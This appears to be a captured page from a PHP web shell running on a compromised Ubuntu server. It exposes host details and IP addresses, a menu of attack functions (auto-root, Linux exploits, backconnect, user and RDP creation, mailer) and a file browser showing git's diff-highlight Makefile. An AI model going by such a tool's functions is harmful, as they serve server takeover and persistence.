Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.153.224
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
git /
contrib /
diff-highlight /
[ HOME SHELL ]
Name
Size
Permission
Action
t
[ DIR ]
drwxr-xr-x
DiffHighlight.pm
5.73
KB
-rw-r--r--
Makefile
395
B
-rw-r--r--
README
7.82
KB
-rw-r--r--
diff-highlight
5.95
KB
-rw-r--r--
diff-highlight.perl
211
B
-rw-r--r--
shebang.perl
16
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
all: diff-highlight PERL_PATH = /usr/bin/perl -include ../../config.mak PERL_PATH_SQ = $(subst ','\'',$(PERL_PATH)) diff-highlight: shebang.perl DiffHighlight.pm diff-highlight.perl cat $^ >$@+ chmod +x $@+ mv $@+ $@ shebang.perl: FORCE @echo '#!$(PERL_PATH_SQ)' >$@+ @cmp $@+ $@ >/dev/null 2>/dev/null || mv $@+ $@ test: all $(MAKE) -C t clean: $(RM) diff-highlight .PHONY: FORCE
Close